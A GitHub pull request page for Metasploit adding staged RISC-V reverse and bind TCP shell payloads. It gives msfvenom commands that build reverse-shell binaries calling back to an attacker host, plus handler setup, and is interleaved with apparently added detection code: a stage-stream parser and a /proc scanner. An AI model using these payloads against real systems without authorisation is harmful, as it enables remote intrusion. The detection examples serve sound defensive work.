Add staged RISC-V (riscv64le/riscv32le) Linux payloads#21237

Open: bcoles wants to merge 1 commit into rapid7:master from bcoles:riscv-staged-payloads

Conversation

@bcoles (Contributor) commented Apr 5, 2026

Add reverse_tcp and bind_tcp stagers and a shell command stage for both RISC-V 64-bit and 32-bit little-endian Linux targets.

Stagers:

  • socket -> connect/bind -> read 4-byte stage length -> mmap RWX -> read loop -> jump to stage
  • Socket fd passed to stage in s1 (x9, callee-saved)
  • handle_intermediate_stage sends stage length as 4-byte LE uint

Stages:

  • dup3 stdin/stdout/stderr from s1 -> execve("/bin/sh")
  • Shell path patchable via SHELL datastore option (16-byte field)

They were written entirely by Claude. Claude one-shotted them.

Verification

Generate payload:

./msfvenom -p linux/riscv64le/shell/reverse_tcp LHOST=192.168.200.204 LPORT=4444 -f elf -o reverse_tcp64
./msfvenom -p linux/riscv64le/shell/bind_tcp LPORT=4444 -f elf -o bind_tcp64
./msfvenom -p linux/riscv32le/shell/reverse_tcp LHOST=192.168.200.204 LPORT=4444 -f elf -o reverse_tcp32
./msfvenom -p linux/riscv32le/shell/bind_tcp LPORT=4444 -f elf -o bind_tcp32

Set up the stager reverse handler:

use exploit/multi/handler
set PAYLOAD linux/riscv64le/shell/reverse_tcp
set LHOST <attacker_ip>
set LPORT 4444
run

Run the generated payload on a RISC-V system. When the stager connects back, the handler automatically sends the 4-byte length + stage. You should get a shell session.
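The handler-to-stager exchange described above (a 4-byte little-endian stage length followed by the stage bytes, consumed by the stager's read loop) is easy to misread from a packet capture when the header or the stage is split across reads. The following is an added example, not code from this pull request or from Metasploit: a stream reassembler that parses that framing from captured chunks the way a network sensor would, handles the header arriving in pieces, rejects implausible lengths, and separates the stage from whatever bytes follow it (which, once the stage runs, are the shell session's own traffic). The stage bytes and chunk boundaries are constructed for the demonstration and are not RISC-V code.

```python
import struct

HEADER_LEN = 4  # the handler prefixes the stage with a 4-byte little-endian unsigned length


class StageStreamParser:
    """Reassemble 'length || stage' from in-order chunks of the handler -> stager stream.

    Mirrors the stager's read loop: collect bytes until the 4-byte header is complete,
    then collect exactly `expected` stage bytes. Anything beyond that is post-stage traffic.
    """

    def __init__(self, max_stage_len=16 * 1024 * 1024):
        self.buf = bytearray()
        self.expected = None          # stage length once the header has been seen
        self.max_stage_len = max_stage_len

    def feed(self, chunk):
        """Consume one captured chunk; returns True once the whole stage is buffered."""
        self.buf.extend(chunk)
        if self.expected is None and len(self.buf) >= HEADER_LEN:
            (self.expected,) = struct.unpack("<I", bytes(self.buf[:HEADER_LEN]))
            del self.buf[:HEADER_LEN]
            # A zero length or an absurd length is not a valid stage; a sensor should flag it
            # rather than allocate max_stage_len bytes on the attacker's say-so.
            if self.expected == 0 or self.expected > self.max_stage_len:
                raise ValueError(f"implausible stage length {self.expected}")
        return self.complete()

    def complete(self):
        return self.expected is not None and len(self.buf) >= self.expected

    def stage(self):
        """The stage bytes, or None while the capture is still incomplete."""
        return bytes(self.buf[:self.expected]) if self.complete() else None

    def remainder(self):
        """Bytes after the stage: the stager never reads these, the stage does."""
        return bytes(self.buf[self.expected:]) if self.complete() else b""


def parse_stage_stream(chunks, max_stage_len=16 * 1024 * 1024):
    """Parse a list of captured chunks; reports a truncated capture instead of raising."""
    parser = StageStreamParser(max_stage_len)
    for chunk in chunks:
        parser.feed(chunk)
    return {
        "length": parser.expected,
        "complete": parser.complete(),
        "stage": parser.stage(),
        "remainder": parser.remainder(),
    }


# Constructed sample: a 37-byte placeholder "stage" (not real RISC-V code), framed as the
# handler would send it, then split at chunk boundaries that cut the header in two and
# deliver the stage in short reads.
CONSTRUCTED_STAGE = bytes(range(37))
CONSTRUCTED_STREAM = struct.pack("<I", len(CONSTRUCTED_STAGE)) + CONSTRUCTED_STAGE + b"id\n"
CONSTRUCTED_CHUNKS = [
    CONSTRUCTED_STREAM[:2],      # first half of the length header
    CONSTRUCTED_STREAM[2:7],     # rest of the header plus 3 stage bytes
    CONSTRUCTED_STREAM[7:27],    # 20 more stage bytes
    CONSTRUCTED_STREAM[27:],     # last 14 stage bytes, then post-stage traffic
]

if __name__ == "__main__":
    result = parse_stage_stream(CONSTRUCTED_CHUNKS)
    print(f"stage length {result['length']}, complete={result['complete']}, "
          f"post-stage bytes={result['remainder']!r}")
    truncated = parse_stage_stream(CONSTRUCTED_CHUNKS[:3])
    print(f"truncated capture: complete={truncated['complete']}")
```

Feeding only the first three chunks reports an incomplete capture rather than a short stage, which is the distinction a sensor needs when a session is cut off before the stage lands.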

Add reverse_tcp and bind_tcp stagers and a shell command stage
for both RISC-V 64-bit and 32-bit little-endian Linux targets.

Stagers:
- socket -> connect/bind -> read 4-byte stage length ->
  mmap RWX -> read loop -> jump to stage
- Socket fd passed to stage in s1 (x9, callee-saved)
- handle_intermediate_stage sends stage length as 4-byte LE uint

Stages:
- dup3 stdin/stdout/stderr from s1 -> execve("/bin/sh")
- Shell path patchable via SHELL datastore option (16-byte field)
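The stage described in the commit message leaves a distinctive trace on the host: it dup3()s the stager's socket onto stdin, stdout and stderr and then execve()s /bin/sh, so the resulting shell has all three standard descriptors pointing at the same socket inode. The following is an added example, not part of this pull request or of Metasploit, of a host-side check for that pattern: a pure classification function over /proc-style descriptor targets (tested on a constructed snapshot) plus a collector that reads the live /proc tree. It is a triage signal, not proof of compromise: inetd-style services and some remote-admin tools legitimately give a shell socket-backed stdio, so hits should be reviewed against the parent process and the peer address. The shell names and the snapshot are assumptions made for the example.

```python
import os

# Process names a socket-backed stdio triple is worth reviewing for (assumed list for the example).
SHELL_NAMES = {"sh", "bash", "dash", "ash", "busybox"}


def socket_stdio(fd_targets):
    """Return {fd: inode-string} for fds 0, 1, 2 whose /proc fd link points at a socket."""
    return {
        fd: target
        for fd, target in fd_targets.items()
        if fd in (0, 1, 2) and target.startswith("socket:")
    }


def classify(proc):
    """proc: {'pid': int, 'comm': str, 'fds': {fd: readlink target}}. Returns a reason or None."""
    if proc["comm"] not in SHELL_NAMES:
        return None
    sockets = socket_stdio(proc["fds"])
    if set(sockets) != {0, 1, 2}:
        return None   # only a full stdin/stdout/stderr triple on sockets matches the stage's dup3 pattern
    same_inode = len(set(sockets.values())) == 1
    detail = "all on one socket" if same_inode else "on sockets"
    return f"pid {proc['pid']} ({proc['comm']}): stdin/stdout/stderr {detail}"


def find_suspicious(procs):
    """Apply classify() to a list of process records and keep the hits."""
    return [reason for reason in (classify(p) for p in procs) if reason]


def scan_proc(proc_root="/proc"):
    """Collect live process records; entries unreadable without privileges are skipped."""
    procs = []
    for name in os.listdir(proc_root):
        if not name.isdigit():
            continue
        try:
            with open(f"{proc_root}/{name}/comm") as f:
                comm = f.read().strip()
            fds = {}
            for fd in (0, 1, 2):
                try:
                    fds[fd] = os.readlink(f"{proc_root}/{name}/fd/{fd}")
                except OSError:
                    pass  # fd closed or not readable
        except OSError:
            continue   # process exited or not ours to inspect
        procs.append({"pid": int(name), "comm": comm, "fds": fds})
    return procs


# Constructed snapshot (not real host data): one stage-style shell, one interactive shell,
# one daemon, and one shell with only stdout/stderr redirected to a socket.
CONSTRUCTED_SNAPSHOT = [
    {"pid": 101, "comm": "sh",   "fds": {0: "socket:[12345]", 1: "socket:[12345]", 2: "socket:[12345]"}},
    {"pid": 102, "comm": "bash", "fds": {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}},
    {"pid": 103, "comm": "sshd", "fds": {0: "/dev/null", 1: "/dev/null", 2: "/dev/null"}},
    {"pid": 104, "comm": "sh",   "fds": {0: "pipe:[999]", 1: "socket:[555]", 2: "socket:[555]"}},
]

if __name__ == "__main__":
    print("constructed snapshot:")
    for line in find_suspicious(CONSTRUCTED_SNAPSHOT):
        print("  " + line)
    print("live /proc:")
    for line in find_suspicious(scan_proc()):
        print("  " + line)
```

Run as an unprivileged user the live scan only sees that user's processes; run it as root (or from an agent with CAP_SYS_PTRACE) to cover the whole system.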

Labels

riscv RISC-V
